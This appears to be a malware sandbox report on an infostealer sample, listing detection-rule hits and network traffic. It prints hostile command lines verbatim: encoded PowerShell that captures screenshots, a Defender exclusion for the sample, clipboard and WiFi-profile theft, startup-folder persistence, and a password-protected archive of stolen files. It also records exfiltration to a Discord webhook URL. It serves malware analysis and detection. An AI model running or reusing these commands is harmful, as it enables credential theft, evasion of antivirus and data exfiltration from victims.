Source: Process started; Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems); Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bexzy300\bexzy300.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bexzy300\bexzy300.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYw
Source: Process started; Author: Nasreddine Bencherchali (Nextron Systems); Data: Command: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", CommandLine: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\X9g8L63QGs.exe", ParentImage: C:\Users\user\Desktop\X9g8L63QGs.exe, ParentProcessId: 3800, ParentProcessName: X9g8L63QGs.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", ProcessId: 3540, ProcessName: cmd.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\X9g8L63QGs.exe'", CommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\X9g8L63QGs.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\X9g8L63QGs.exe", ParentImage: C:\Users\user\Desktop\X9g8L63QGs.exe, ParentProcessId: 3800, ParentProcessName: X9g8L63QGs.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\X9g8L63QGs.exe'", ProcessId: 1476, ProcessName: cmd.exe
Source: File created; Author: Christopher Peacock @securepeacock, SCYTHE @scythe_io; Data: EventID: 11, Image: C:\Users\user\Desktop\X9g8L63QGs.exe, ProcessId: 3800, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr
Source: File created; Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research); Data: EventID: 11, Image: C:\Users\user\Desktop\X9g8L63QGs.exe, ProcessId: 3800, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp
Source: Process started; Author: frack113; Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
Source: File created; Author: frack113; Data: EventID: 11, Image: C:\Users\user\Desktop\X9g8L63QGs.exe, ProcessId: 3800, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr
Source: Process started; Author: frack113, Nasreddine Bencherchali; Data: Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES5209.tmp" "c:\Users\user\AppData\Local\Temp\bexzy300\CSC6721B5F011FD4FBD8DF74B583831980.TMP", CommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES5209.tmp" "c:\Users\user\AppData\Local\Temp\bexzy300\CSC6721B5F011FD4FBD8DF74B583831980.TMP", CommandLine|base64offset|contains: 8c, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bexzy300\bexzy300.cmdline", ParentImage: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentProcessId: 5528, ParentProcessName: csc.exe, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES5209.tmp" "c:\Users\user\AppData\Local\Temp\bexzy300\CSC6721B5F011FD4FBD8DF74B583831980.TMP", ProcessId: 7256, ProcessName: cvtres.exe
              Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3920, TargetFilename: C:\Users\user\AppData\Local\Temp\bexzy300\bexzy300.cmdline
              Source: Process startedAuthor: Timur Zinniatullin, E.M. Anhaus, oscd.community: Data: Command: C:\Users\user~1\AppData\Local\Temp\_MEI33962\rar.exe a -r -hp"Cribry10" "C:\Users\user~1\AppData\Local\Temp\aaDHy.zip" *, CommandLine: C:\Users\user~1\AppData\Local\Temp\_MEI33962\rar.exe a -r -hp"Cribry10" "C:\Users\user~1\AppData\Local\Temp\aaDHy.zip" *, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user~1\AppData\Local\Temp\_MEI33962\rar.exe a -r -hp"Cribry10" "C:\Users\user~1\AppData\Local\Temp\aaDHy.zip" *", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6828, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Users\user~1\AppData\Local\Temp\_MEI33962\rar.exe a -r -hp"Cribry10" "C:\Users\user~1\AppData\Local\Temp\aaDHy.zip" *, ProcessId: 2564, ProcessName: rar.exe
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\X9g8L63QGs.exe', CommandLine: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\X9g8L63QGs.exe', CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\X9g8L63QGs.exe'", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1476, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\X9g8L63QGs.exe', ProcessId: 7268, ProcessName: powershell.exe

              Data Obfuscation

              Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bexzy300\bexzy300.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bexzy300\bexzy300.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand

              Stealing of Sensitive Information

              Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", CommandLine: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\X9g8L63QGs.exe", ParentImage: C:\Users\user\Desktop\X9g8L63QGs.exe, ParentProcessId: 3800, ParentProcessName: X9g8L63QGs.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", ProcessId: 1476, ProcessName: cmd.exe
              No Suricata rule has matched


              AV Detection

              Source: X9g8L63QGs.exeReversingLabs: Detection: 47%
              Source: X9g8L63QGs.exeVirustotal: Detection: 67%
              Source: Submitted SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Source: X9g8L63QGs.exeJoe Sandbox ML: detected
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080A901C CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,97_2_00007FF7080A901C
              Source: X9g8L63QGs.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
              Source: Binary string: D:\a\1\b\bin\amd64\python312.pdb source: X9g8L63QGs.exe, 00000007.00000002.1713477885.00007FFB0C620000.00000040.00000001.01000000.00000005.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: X9g8L63QGs.exe, 00000007.00000002.1710702996.00007FFB0B9BF000.00000040.00000001.01000000.00000014.sdmp
              Source: Binary string: D:\a\1\b\libcrypto-3.pdb| source: X9g8L63QGs.exe, 00000007.00000002.1711557292.00007FFB0BEEA000.00000040.00000001.01000000.00000010.sdmp
              Source: Binary string: D:\a\1\b\libssl-3.pdbDD source: X9g8L63QGs.exe, 00000007.00000002.1711177920.00007FFB0BA55000.00000040.00000001.01000000.00000011.sdmp
              Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: X9g8L63QGs.exe, 00000004.00000003.1270486310.000001FB29EDF000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000002.1715735925.00007FFB1C264000.00000002.00000001.01000000.00000006.sdmp
              Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG" source: X9g8L63QGs.exe, 00000007.00000002.1711557292.00007FFB0BE52000.00000040.00000001.01000000.00000010.sdmp
              Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: X9g8L63QGs.exe, 00000004.00000003.1270486310.000001FB29EDF000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000002.1715735925.00007FFB1C264000.00000002.00000001.01000000.00000006.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: X9g8L63QGs.exe, X9g8L63QGs.exe, 00000007.00000002.1712903325.00007FFB0C021000.00000040.00000001.01000000.0000000C.sdmp
              Source: Binary string: D:\a\1\b\libcrypto-3.pdb source: X9g8L63QGs.exe, 00000007.00000002.1711557292.00007FFB0BEEA000.00000040.00000001.01000000.00000010.sdmp
              Source: Binary string: ;C:\Users\user\AppData\Local\Temp\bexzy300\bexzy300.pdb source: powershell.exe, 00000046.00000002.1499829000.0000017515AF3000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: D:\Projects\WinRAR\rar\build\rar64\Release\RAR.pdb source: rar.exe, 00000061.00000002.1609980700.00007FF708100000.00000002.00000001.01000000.0000001F.sdmp, rar.exe, 00000061.00000000.1596460046.00007FF708100000.00000002.00000001.01000000.0000001F.sdmp, rar.exe.4.dr
              Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: X9g8L63QGs.exe, X9g8L63QGs.exe, 00000007.00000002.1716138569.00007FFB1D5B1000.00000040.00000001.01000000.0000000E.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: X9g8L63QGs.exe, X9g8L63QGs.exe, 00000007.00000002.1714967826.00007FFB1B6F1000.00000040.00000001.01000000.00000007.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: X9g8L63QGs.exe, X9g8L63QGs.exe, 00000007.00000002.1714746731.00007FFB1AB01000.00000040.00000001.01000000.00000012.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: X9g8L63QGs.exe, 00000007.00000002.1714464196.00007FFB167AB000.00000040.00000001.01000000.00000009.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: X9g8L63QGs.exe, X9g8L63QGs.exe, 00000007.00000002.1715936942.00007FFB1D341000.00000040.00000001.01000000.00000013.sdmp
              Source: Binary string: ;C:\Users\user\AppData\Local\Temp\bexzy300\bexzy300.pdbhPa source: powershell.exe, 00000046.00000002.1499829000.0000017515AF3000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: X9g8L63QGs.exe, 00000007.00000002.1714464196.00007FFB167AB000.00000040.00000001.01000000.00000009.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: X9g8L63QGs.exe, X9g8L63QGs.exe, 00000007.00000002.1715481605.00007FFB1BB11000.00000040.00000001.01000000.0000000A.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: X9g8L63QGs.exe, X9g8L63QGs.exe, 00000007.00000002.1715198195.00007FFB1BA41000.00000040.00000001.01000000.0000000D.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: X9g8L63QGs.exe, X9g8L63QGs.exe, 00000007.00000002.1713252916.00007FFB0C1A1000.00000040.00000001.01000000.0000000B.sdmp
              Source: Binary string: D:\a\1\b\libssl-3.pdb source: X9g8L63QGs.exe, 00000007.00000002.1711177920.00007FFB0BA55000.00000040.00000001.01000000.00000011.sdmp
              Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\bexzy300\bexzy300.pdb source: powershell.exe, 00000046.00000002.1579982318.000001752C6A9000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: X9g8L63QGs.exe, 00000007.00000002.1712634643.00007FFB0BFE1000.00000040.00000001.01000000.0000000F.sdmp
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 4_2_00007FF7C26683B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,4_2_00007FF7C26683B0
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 4_2_00007FF7C26692F0 FindFirstFileExW,FindClose,4_2_00007FF7C26692F0
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 4_2_00007FF7C26818E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,4_2_00007FF7C26818E4
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FF7C26692F0 FindFirstFileExW,FindClose,7_2_00007FF7C26692F0
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FF7C26683B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,7_2_00007FF7C26683B0
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FF7C26818E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,7_2_00007FF7C26818E4
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080B46EC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,97_2_00007FF7080B46EC
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080AE21C FindFirstFileW,FindClose,CreateFileW,DeviceIoControl,CloseHandle,97_2_00007FF7080AE21C
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080F88E0 FindFirstFileExA,97_2_00007FF7080F88E0
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\System32\AppxSip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mf49f6405#\
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\System32\en-GB\CRYPT32.dll.mui
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\System32\WindowsPowerShell\v1.0\pwrshsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SYSTEM32\OpcServices.DLL
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mf49f6405#\7488c4f196cfa60a4ca5cca24e2169b0\Microsoft.Management.Infrastructure.ni.dll
              Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
              Source: Joe Sandbox ViewIP Address: 162.159.137.232 162.159.137.232
              Source: unknownDNS query: name: ip-api.com
              Source: unknownDNS query: name: ip-api.com
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FFB1BA462B4 recv,7_2_00007FFB1BA462B4
              Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comAccept-Encoding: identityUser-Agent: python-urllib3/2.2.3
              Source: global trafficHTTP traffic detected: GET /json/?fields=225545 HTTP/1.1Host: ip-api.comAccept-Encoding: identityUser-Agent: python-urllib3/2.2.3
              Source: X9g8L63QGs.exe, 00000007.00000002.1701157947.000001E7C3858000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: `https://www.facebook.com/ equals www.facebook.com (Facebook)
              Source: X9g8L63QGs.exe, 00000007.00000002.1701157947.000001E7C3858000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: `https://www.youtube.com/ equals www.youtube.com (Youtube)
              Source: global trafficDNS traffic detected: DNS query: blank-ivnd9.in
              Source: global trafficDNS traffic detected: DNS query: ip-api.com
              Source: global trafficDNS traffic detected: DNS query: discord.com
              Source: unknownHTTP traffic detected: POST /api/webhooks/1315377405426270278/HIGwvC-Zpfa8Zkb7aEYPMg-EuYuZPz1LJEfXefQjcA8JYgb6wbSS5zj82QNtaz9Su_0D HTTP/1.1Host: discord.comAccept-Encoding: identityContent-Length: 755602User-Agent: python-urllib3/2.2.3Content-Type: multipart/form-data; boundary=37a76d34b53131452d6fc832f167ffc7
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 05 Jan 2025 06:19:51 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1736057992x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hAXIq9XtArVKc%2Ffubs8AT0r1q2NMEWVkjfKCdI6jYKfc1azRAidxd4u3EbEtHoGK3aODxcAqyDIfPtP5tjiUcDJFBrKwLRcktghWLo%2B2qmX%2BB5kfWJsHE43k6je%2F"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=14735b5a48e24b09b557091335c501751a43c2b5-1736057991; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: _cfuvid=q.0E45z3pGSklbxiFMyXrHfDuxC.4JrCDgahg7Y.Fx0-1736057991326-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8fd15bea497fef9d-EWR
              Source: X9g8L63QGs.exe, 00000004.00000003.1273728982.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digi
              Source: X9g8L63QGs.exe, 00000004.00000003.1274105717.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.co
              Source: X9g8L63QGs.exe, 00000004.00000003.1271192844.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1271975755.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1271403967.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1275978530.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1273821737.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1271192844.000001FB29EED000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1274105717.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1273728982.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1273315445.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1271270845.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1276344196.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1270860753.000001FB29EDF000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1270706843.000001FB29EDF000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1270624594.000001FB29EDF000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1275806701.000001FB29EED000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1271008823.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1275806701.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1271079647.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, _hashlib.pyd.4.dr, _ssl.pyd.4.dr, libcrypto-3.dll.4.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
              Source: X9g8L63QGs.exe, 00000004.00000003.1271192844.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1271975755.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1271403967.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1275978530.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1273821737.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1274105717.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1273728982.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1273315445.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1271270845.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1276344196.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1270860753.000001FB29EDF000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1270706843.000001FB29EDF000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1270624594.000001FB29EDF000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1271008823.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1275806701.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 